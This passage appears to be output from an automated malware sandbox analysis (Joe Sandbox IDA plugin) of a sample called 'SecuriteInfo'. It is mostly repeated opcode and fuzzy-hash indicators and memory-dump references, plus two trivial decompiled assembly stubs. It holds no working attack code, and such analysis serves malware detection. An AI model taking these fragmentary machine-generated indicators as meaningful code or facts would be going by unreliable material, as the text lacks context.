                                                        • Opcode ID: 37ccf90601a1c4fa2bbda9d6c5dca8a2f1874210e1357bafd548d367daa821d6
                                                        • Instruction ID: 922c0c4087505eeec8834291fc1c6e1edc5fba6dbd4991a27df60306114392a9
                                                        • Opcode Fuzzy Hash: 37ccf90601a1c4fa2bbda9d6c5dca8a2f1874210e1357bafd548d367daa821d6
                                                        • Instruction Fuzzy Hash: A301717220164A7FD251AB6DCD88E53F7ACEF55760B000229F608C3B52CB24ED11C6E4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e5a78d14d39f3afd8fd74f4e7cf161ab213c3c7b3632f9c8af1d97fd2f53a219
                                                        • Instruction ID: 18d56d97d8ccf6afab6edcb920dbdf89c59632eeafd1bec3019dc7d7caafda0d
                                                        • Opcode Fuzzy Hash: e5a78d14d39f3afd8fd74f4e7cf161ab213c3c7b3632f9c8af1d97fd2f53a219
                                                        • Instruction Fuzzy Hash: 13019E71A0125DABDB14DFA9D846EAEBBB8EF44710F404066F901EB380DA74AB41CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5d892cb72cf86c9cf07e833b5b8ce758d985f2288a3e2753a0254e0504543e23
                                                        • Instruction ID: 3492c7addad5aec4faa0ed46a0ec78d7bc6d9008454be9e5d55ef4710772ad04
                                                        • Opcode Fuzzy Hash: 5d892cb72cf86c9cf07e833b5b8ce758d985f2288a3e2753a0254e0504543e23
                                                        • Instruction Fuzzy Hash: 32019E71A0121DABDB14DFA8D846EAFBBB8EF44710F404066F941EB380DA74AB40CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0eb1097394d59e3228dc25655c32911a2fed37ef55462120db306e3738c06b2f
                                                        • Instruction ID: e7ab8f905b2dc6f3afa13d81ba4395da4ff4b4d1bec254cd2b70b0840a6b132e
                                                        • Opcode Fuzzy Hash: 0eb1097394d59e3228dc25655c32911a2fed37ef55462120db306e3738c06b2f
                                                        • Instruction Fuzzy Hash: 3D019271A0121DABDB14DFA9D846EAEBBB8EF44710F404066F941EB380DA749B40CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 06d75836c9573aa0e55f1f59fba811012c8e74f5e68e5d7ca759bd447d74ee88
                                                        • Instruction ID: b592c5bf1401fb05b493d9d0c383c33e92257eaac768b1d1197a5b4d1d4e30a8
                                                        • Opcode Fuzzy Hash: 06d75836c9573aa0e55f1f59fba811012c8e74f5e68e5d7ca759bd447d74ee88
                                                        • Instruction Fuzzy Hash: 9911A132510B02DFD7369F18C884B22FBE1FF54722F15C868E5898A592C778E880CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e111f1c2a87fe24181913a51465c1261237fbb57019fe261cc77792277cfabb6
                                                        • Instruction ID: 7a9c0092dea53bb4736293c5fef697c3e26798baac5e33769ab67d3f8e898c4c
                                                        • Opcode Fuzzy Hash: e111f1c2a87fe24181913a51465c1261237fbb57019fe261cc77792277cfabb6
                                                        • Instruction Fuzzy Hash: 53015E71E0125DABDB14EFA9D846EAEBBB8EF44710F444066F901EB380DA749B40CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3f0a176274f19c197d010394d4c97c1766f13969825eb76689f8930bcee854df
                                                        • Instruction ID: acfa2b9ca0af26b8639b3b0e3bd3cb3995d3a6092bcade808e74cae306d0ac4a
                                                        • Opcode Fuzzy Hash: 3f0a176274f19c197d010394d4c97c1766f13969825eb76689f8930bcee854df
                                                        • Instruction Fuzzy Hash: 7F019E71A0131CAFDB14DFADD846EAEBBB8EF44710F404066F901EB280EA749B40CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0f90ec756a43907851362942466979eb3a3a62206283fd0ff13bc878c4f9982f
                                                        • Instruction ID: 4c40533eaef10ff3609259739929e659c2ede48dc426a174a5995f06307b834e
                                                        • Opcode Fuzzy Hash: 0f90ec756a43907851362942466979eb3a3a62206283fd0ff13bc878c4f9982f
                                                        • Instruction Fuzzy Hash: E9019E71A0125CAFDB14DFACD846EAEBBB8EF45710F404066F945EB280DA70DB40CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fab0c485f60ad926169880dc8cf1c2acbb4a6bb70ced4fcaa2074de596fe31cb
                                                        • Instruction ID: f1b0d6505787ec8c1970c5a5ee9a2c7a743986c55932633758b2706eea105d06
                                                        • Opcode Fuzzy Hash: fab0c485f60ad926169880dc8cf1c2acbb4a6bb70ced4fcaa2074de596fe31cb
                                                        • Instruction Fuzzy Hash: 110171322046019FE7259A69D884F96BBEEEBC6710F08485DE646CB750DA74F940CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                        • Instruction ID: 96e7675994b11bade0212a331681e515f96e98c803435629fd3618cbf5f8ff03
                                                        • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                        • Instruction Fuzzy Hash: 03E02B323405116BE7129E0DCC80F03376DDF92724F014078FA009E282C6E5DE4887A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2a8d63cbade05924eac9046bb7a4e6037edcb7ce2a00032f93b092d509f1c9ff
                                                        • Instruction ID: 17d584a011267b02c519275c336599c26d90ceae40a1f83f02ad6c0735ae946c
                                                        • Opcode Fuzzy Hash: 2a8d63cbade05924eac9046bb7a4e6037edcb7ce2a00032f93b092d509f1c9ff
                                                        • Instruction Fuzzy Hash: 84F09070A0561C9FDB14EBA8D441AAEB7B8AB14300F508099E905EB380EA34DA008B55
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2fa2f3d9456928cee8b0a4103d48f069629552073c31be7d367639f3c05f7b40
                                                        • Instruction ID: f17adb978277877b83718069282839de2fcb45b5ef536cfd948405e1348a9edc
                                                        • Opcode Fuzzy Hash: 2fa2f3d9456928cee8b0a4103d48f069629552073c31be7d367639f3c05f7b40
                                                        • Instruction Fuzzy Hash: FBF0B470A0521D9FDB14EFB8D942AAEB7B8FF15300F404459E905EB380EA34EA00CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 94e5c01722195ccde4e3db84626634fa260a5834a27877c347a6a7c61d7c80f3
                                                        • Instruction ID: ec1accf880ecdf6ab083b0593c8044475a698e479d63713bb2a5f8091172aa98
                                                        • Opcode Fuzzy Hash: 94e5c01722195ccde4e3db84626634fa260a5834a27877c347a6a7c61d7c80f3
                                                        • Instruction Fuzzy Hash: 79F0B470A1575D9FDB14EFB8D941E6EB7B8EF14300F004059E905DB380EA34DA00CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0a353d07679a98d56d17b7b3564046e49679fa6a8c8491971e0816d4aa971f28
                                                        • Instruction ID: 91ddc0f7311aaf6b50f62b7b9477c312b81f81172d4968930a03c6976e284d78
                                                        • Opcode Fuzzy Hash: 0a353d07679a98d56d17b7b3564046e49679fa6a8c8491971e0816d4aa971f28
                                                        • Instruction Fuzzy Hash: ABF08271A0525CAFDB14DBEDD84AAAE77B4EF08304F400099E905EB2C0E974DA40C755
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8b3ef2f93cb205cec6f99c288d61976b8a683425d00a17497b2d940176bc6716
                                                        • Instruction ID: 9c3437de227b94f0528a94482acee1b4290918db6e8e8060767041df3fc56e09
                                                        • Opcode Fuzzy Hash: 8b3ef2f93cb205cec6f99c288d61976b8a683425d00a17497b2d940176bc6716
                                                        • Instruction Fuzzy Hash: 88F05E70A0526DABDB14EBBCD946AAEB7B8EB04304F440459E955DB381EA34DA00C759
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3ad7a4dead28b6dd87c4c4dc329e8efdd4b492a1b015b89ae1309afe0f985b1a
                                                        • Instruction ID: 414577feb41e3cd0e27d6d615ae456a4dd4d70ccbd8a33159c97b6d10e420c5e
                                                        • Opcode Fuzzy Hash: 3ad7a4dead28b6dd87c4c4dc329e8efdd4b492a1b015b89ae1309afe0f985b1a
                                                        • Instruction Fuzzy Hash: 1DF082B0A0525DABDB14EBBCD946E6EB7B8EF04304F440459FA05DB3C1EA34DA00C795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 287e2923706fd81787cda8d1c031dd9d09d2cc516845271ccf3ce27a3cf8d8d1
                                                        • Instruction ID: b2d5063f8ac306b2e566dc9a9b8d56dcb5191d93b848a0ec1edde28c581f849b
                                                        • Opcode Fuzzy Hash: 287e2923706fd81787cda8d1c031dd9d09d2cc516845271ccf3ce27a3cf8d8d1
                                                        • Instruction Fuzzy Hash: 4AF0E270A0521DABCB04EBACD846EAE77B8EF19300F14019AE902EB3C0EA34DA00C755
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5cf5dc68fe3e0b2e9befbc73c22f8af4721454acb29b39da63ed9e5a0093760a
                                                        • Instruction ID: 58a28affd4f951c56f494acb983424f1e76c5abea61a7c5aaddfd586514bffd6
                                                        • Opcode Fuzzy Hash: 5cf5dc68fe3e0b2e9befbc73c22f8af4721454acb29b39da63ed9e5a0093760a
                                                        • Instruction Fuzzy Hash: BBF0B434B0094DAADF939B6CCCC0B79BF61AF04358F064119D5D1E71E1E724AA00C795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8998f530bffdda7d0d30e61591a798cd412c4d43ff4e463d0df998cfc179c0d5
                                                        • Instruction ID: 3f32609e4be823522f14a2549fd121c0e74c065b9f41231cdc120a3e904089f5
                                                        • Opcode Fuzzy Hash: 8998f530bffdda7d0d30e61591a798cd412c4d43ff4e463d0df998cfc179c0d5
                                                        • Instruction Fuzzy Hash: 8DF0E23252568C8FD772EF5CC184BA3B7D8AB04B78F4484B4F605C7A22CB24EE80C648
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1316384a1fe986309cad5a59fd6b6bc372c6a06ba79fabd2add55ade94e5028e
                                                        • Instruction ID: 783203b38f00e863bfa0240f97cc1346529960be308695f49684248ab1db254b
                                                        • Opcode Fuzzy Hash: 1316384a1fe986309cad5a59fd6b6bc372c6a06ba79fabd2add55ade94e5028e
                                                        • Instruction Fuzzy Hash: 00F0E235D113C98FD722872CC044B21BBD8AB41B30F2A4075EA04CBA03C728CA80C6E2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f2369be90f167afde2c66cd3a0260d69c48f7b2d608e96a55de902251b9f9301
                                                        • Instruction ID: 52ab06445cba624ab0bd2fc2ad5661688b6b3bf8c994cb7b4fbf20b00d3af177
                                                        • Opcode Fuzzy Hash: f2369be90f167afde2c66cd3a0260d69c48f7b2d608e96a55de902251b9f9301
                                                        • Instruction Fuzzy Hash: 16E092B3A42421ABD2225A18EC40F6673ADDBE4B55F094035E605E7254D628DE01C7E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                        • Instruction ID: b2dd302411533751174dc62e3cd23cbe82ac501ac059f37b9764d4f68328f9fa
                                                        • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                        • Instruction Fuzzy Hash: C1E0DF32A40118FBDB21AADD9E09FAAFFECDB98B60F000196FA04DB590D5609E00D2D1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: abd4c1e868dd77add1da121991445beedef88028e086df1525fa9b969b472fc7
                                                        • Instruction ID: d61b49fd80388ddc01f71381914197c0c83ef4506c02069f39aabcf345a6630f
                                                        • Opcode Fuzzy Hash: abd4c1e868dd77add1da121991445beedef88028e086df1525fa9b969b472fc7
                                                        • Instruction Fuzzy Hash: 39E0E53120014693CB32AA48C40ABB6F3D9AB99700F688071E402CB542D7709C41C3D0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 315252d8d3e5e1fdd0d3f6bd8f50884039f61c830c14d95a10b54c942d48fd22
                                                        • Instruction ID: e3afa451c07f73d1f6edd8f6060e66b28e387624394f7da05565605ec1bd652c
                                                        • Opcode Fuzzy Hash: 315252d8d3e5e1fdd0d3f6bd8f50884039f61c830c14d95a10b54c942d48fd22
                                                        • Instruction Fuzzy Hash: AAE0DF71180258AFFB12DF08C844FA53FA9AF44720F00C114E609CB161D770DEC0CB06
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 614e76d4958de71789d6a72b7418f718657cf9db2a85d38c998bdff5b614b520
                                                        • Instruction ID: 63b894308fca5cd1d4ff0910aac7aef41e4c3cbb40bce99a93592d2d795767b1
                                                        • Opcode Fuzzy Hash: 614e76d4958de71789d6a72b7418f718657cf9db2a85d38c998bdff5b614b520
                                                        • Instruction Fuzzy Hash: 37E0DFB2209204DFD736DF5AD880F27BBDC9B52721F19846DE2088B302CA21D880C286
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f12a8b2d0c9d7e0264d977a0f258daeba5143ad1a5a9980ab3fbefb35b53e456
                                                        • Instruction ID: f14ea35c827f8b040c4269d87b69c540441492f07fe6252c16e0477163aa6966
                                                        • Opcode Fuzzy Hash: f12a8b2d0c9d7e0264d977a0f258daeba5143ad1a5a9980ab3fbefb35b53e456
                                                        • Instruction Fuzzy Hash: 2EF01578922702EFCBB2EFADD50471477A4F796710F42811AD114C7288CB7487A4CF02
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                        • Instruction ID: d411e5b4b3846929c1be6f28801d4bce6b5d48a8cde42ddc492e77d26083e4ed
                                                        • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                        • Instruction Fuzzy Hash: E3E0C231280209FBDF325E88CC00F79BB56DB507A1F104031FE489A691CA75AE91E6C8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a2301cbb80807bd86986fb20a83a6222ed7f6f329ba40549649f5f350f115ca8
                                                        • Instruction ID: 77255a3d6bd0020a6ee2c0e276e0b022038286023e14d4f9d07fd4bde2972922
                                                        • Opcode Fuzzy Hash: a2301cbb80807bd86986fb20a83a6222ed7f6f329ba40549649f5f350f115ca8
                                                        • Instruction Fuzzy Hash: 54E0C231550220FFDB336B2CED08F62B6E9BF58710F110469F181850B6CB7199D1DB82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e30cae86ea78cec383db7d14732ea34e2061e071864ba801bc856cd5b88a8ce4
                                                        • Instruction ID: 6a7bc6fa7b1e56822267aafe326efe378f7a88dc0eeca2aecb11e292a0c05c85
                                                        • Opcode Fuzzy Hash: e30cae86ea78cec383db7d14732ea34e2061e071864ba801bc856cd5b88a8ce4
                                                        • Instruction Fuzzy Hash: F4D02B6212258C5AC72E5304CC14F21331AF7807A0F34040CF303CB5D9F9608BD8A109
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 16%
                                                        			E00407B1A(void* __eax, void* __ebx, void* __edi) {
                                                        
                                                        				asm("movsb");
                                                        				asm("adc [ecx+0x58bf32b1], eax");
                                                        				return 1;
                                                        			}



                                                        0x00407b1e
                                                        0x00407b25
                                                        0x00407b3a

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_400000_SecuriteInfo.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 37%
                                                        			E00417331(void* __eax) {
                                                        
                                                        				asm("lodsb");
                                                        				return __eax;
                                                        			}



                                                        0x00417331
                                                        0x0041733c

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_400000_SecuriteInfo.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
